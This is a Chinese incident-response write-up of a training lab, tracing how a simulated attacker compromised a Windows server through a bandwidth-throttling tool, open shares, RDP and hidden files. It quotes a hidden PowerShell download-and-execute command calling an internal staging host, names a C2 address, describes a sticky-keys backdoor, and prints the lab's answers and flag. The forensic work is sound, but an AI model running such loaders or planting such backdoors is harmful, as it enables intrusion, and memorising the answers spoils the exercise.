也是好久没有写应急响应的文章了,差不多一个多月了吧;所以今天给大家恢复一下记忆;
- 本靶场来自于知攻善防实验室出品的近源OS靶场,旨在帮助大家提升技能,熟练应对真实生活中的攻击以及意外;
文章目录
-
- 靶机介绍
-
- 环境搭建
- 溯源过程
-
- 进程排查
- 目录文件排查
-
- 排查本机文件
- 新知识:怎么得到一个程序的md5值?
-
- 方法:使用 Windows 自带 certutil(推荐,无需额外安装)
- 排查Web应用
- 日志排查
- 隐藏文件
- 检测伪装文件
- flag(看网上WP)
- 解题
-
- 总结
靶机介绍
免责声明
本文仅用于网络安全技术学习与实验交流,所有操作均在合法授权环境下进行。 严禁用于未授权渗透、恶意攻击等违法用途。如有侵权,请联系删除。
环境搭建
前景需要:小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。
需要解决的问题:
账户密码:Administrator / zgsf@2024
这里为了仿照现实中的事件,我并不会按照题目的顺序去解题,而是根据我自己的习惯去排查以及分析;如有不足,敬请指正;
溯源过程
我们打开靶机,可以看到是一台Windows Server2008的服务器:

进程排查
既然是连不上网络,那么我们可以先进行进程的排查:
输入命令:netstat -ano 没有发现可疑的外连地址

任务管理器也没有发现异常;
目录文件排查
排查本机文件
既然“鼠标能够自己移动”,那肯定是存在某个异常的可执行文件上传到了电脑,才会导致这种结果;
所以我们可以先排查用户的目录 / 文件 是否存在异常:

作用:这是 FileZilla Portable,它是一款便携式 FTP 客户端软件,主要用于在本地计算机和远程服务器之间进行文件传输。
有没有可能这是学生留下的?保持疑问;
继续排查:
在C:\\PerfLogs\\666\\666\\777\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666发现了可疑程序:

网上搜查后发现:p2pover4.34.exe 是经典局域网管理工具 「P2P 终结者」 的 v4.34 版本主程序,属于 Windows 平台的局域网带宽管控软件,绿色免安装,体积小巧。
所以这个应该就是控制网速的软件;
新知识:怎么得到一个程序的md5值?
方法:使用 Windows 自带 certutil(推荐,无需额外安装)
打开命令提示符:按 Win + R 输入 cmd 回车。 执行计算命令:复制以下命令,替换 程序名.exe 为实际文件名,直接运行:
certutil -hashfile "C:\\PerfLogs\\666\\666\\777\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\程序名.exe" MD5
# 针对特定程序
certutil -hashfile "C:\\PerfLogs\\666\\666\\777\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\666\\p2pover4.34.exe" MD5
结果如下:
MD5值为:2a5d8838bdb4d404ec632318c94adc96
排查Web应用
随后查看PHPstudy的日志:

经过排查,也并没有发现可疑文件;
但是用D盾 时,发现开启了共享服务,应该就是通过SMB等服务上传了文件:

输入命令net share 发现确实开启着 $IPC共享文件服务:

日志排查
接下来那就是系统日志:
这里排查到RDP远程桌面的时候,发现了一点线索:

192.168.20.0/24 这个应该就是内网的网段;
隐藏文件
这里我们使用命令去检查主机上所有盘的隐藏文件:
CMD 查看隐藏文件:
# 查看当前目录下的隐藏文件/文件夹
dir /a:h
# 查看 C 盘所有隐藏文件(含子目录)
dir /a:h /s C:\\
# 只看隐藏文件(不含文件夹)
dir /a:-d /a:h
# 简洁列表(只显示名称)
dir /a:h /b
图形化操作:
- 勾选 显示隐藏的文件、文件夹和驱动器。
- (可选)取消勾选 隐藏受保护的操作系统文件(推荐)。
确实在C:\\Users\\Administrator\\Desktop\\lnk发现了文件:

内容如下:
powershell.exe -nop -w hidden -c "IEX ((new–object net.webclient).downloadstring('http://192.168.20.129:801/a'))"

所以内网跳板地址为:192.168.20.129
检测伪装文件
这里看到桌面有这么多文件,可疑检查一下是否有恶意文件:

而我的电脑立马就弹出了警告:

丢进云沙箱里分析:

可以看到当点击这个恶意文件时,就会从 http://8.219.200.130/hhW5 上执行程序,从而上线到对方的C2服务器;
flag(看网上WP)
这个我是真没想到:
还有个一个后门就是shift后门,按5下shift就可以弹出cmd窗口,哪怕在锁屏的情况下也可以;
- 原因是原本的文件被替换了

可以得到flag值为:flag{zgsf@shift666}
certutil -hashfile "C:\\Windows\\System32\\sethc.exe" MD5

相应的hash值为:58a3ff82a1aff927809c529eb1385da1
解题
打开程序:

C:\\Users\\Administrator\\Desktop>解题工具.exe
欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
欢迎使用 知攻善防实验室-解题系统(公众号:知攻善防实验室)
在此之前,你应该获得以下信息:
1.攻击者的外网IP地址
2.攻击者的内网跳板IP地址
3.攻击者使用的限速软件的md5大写
4.攻击者的后门md5大写
5.攻击者留下的flag
你准备好了吗?(y/n):y
请输入攻击者的外网IP地址:8.219.200.130
正确!
请输入攻击者的内网跳板IP地址:192.168.20.129
正确!
请输入攻击者使用的限速软件的md5小写:2A5D8838BDB4D404EC632318C94ADC96
正确!
请输入攻击者的后门md5小写:58A3FF82A1AFF927809C529EB1385DA1
正确
请输入攻击者留下的flag:flag{zgsf@shift666}
flag正确!!
恭喜您,您已攻克此靶机!
恭喜您,您已攻克此靶机!
恭喜您,您已攻克此靶机!
恭喜您,您已攻克此靶机!
恭喜您,您已攻克此靶机!
恭喜您,您已攻克此靶机!
请按任意键继续. . .
总结
这次应急响应有很多是我第一次遇到的技术:
- 获取程序的hash值
- 隐藏文件查找
- 伪装文件丢给杀软检测
- 五次粘滞键shifit
期待下次再见;




